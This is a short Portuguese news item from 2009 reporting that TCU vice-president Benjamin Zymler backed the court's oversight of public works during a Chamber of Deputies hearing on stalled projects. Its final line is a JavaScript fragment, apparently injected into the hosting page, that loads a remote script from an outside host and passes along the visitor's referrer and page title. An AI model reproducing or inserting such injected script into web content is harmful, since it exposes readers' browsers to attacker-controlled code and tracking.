Ministro do TCU defende mais atuação

May 15 2009
(0) Comments

Diário Catarinense – Florianópolis, 15/05/2009
O vice-presidente do Tribunal de Contas da União (TCU), ministro Benjamin Zymler, defendeu que o tribunal fiscalize as obras públicas. A ampliação da atuação do TCU foi debatida durante audiência pública realizada na Câmara dos Deputados.

Segundo o ministro, todos os anos a Lei de Diretrizes Orçamentárias (LDO) traz comandos para que o tribunal informe ao Congresso as obras com indícios de irregularidades.

– Esse trabalho demanda um grande esforço do TCU e, no ano de 2008, proporcionou uma economia de mais de R$ 2,5 bilhões – disse o ministro por meio de nota.

A paralisação de obras públicas foi um dos assuntos debatidos na audiência. O deputado Beto Albuquerque (PSB-RS) defendeu a criação de mecanismos de controle e de punição para os responsáveis pelos atrasos. O ministro ressaltou que não se pode culpar o TCU pela paralisação das obras.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;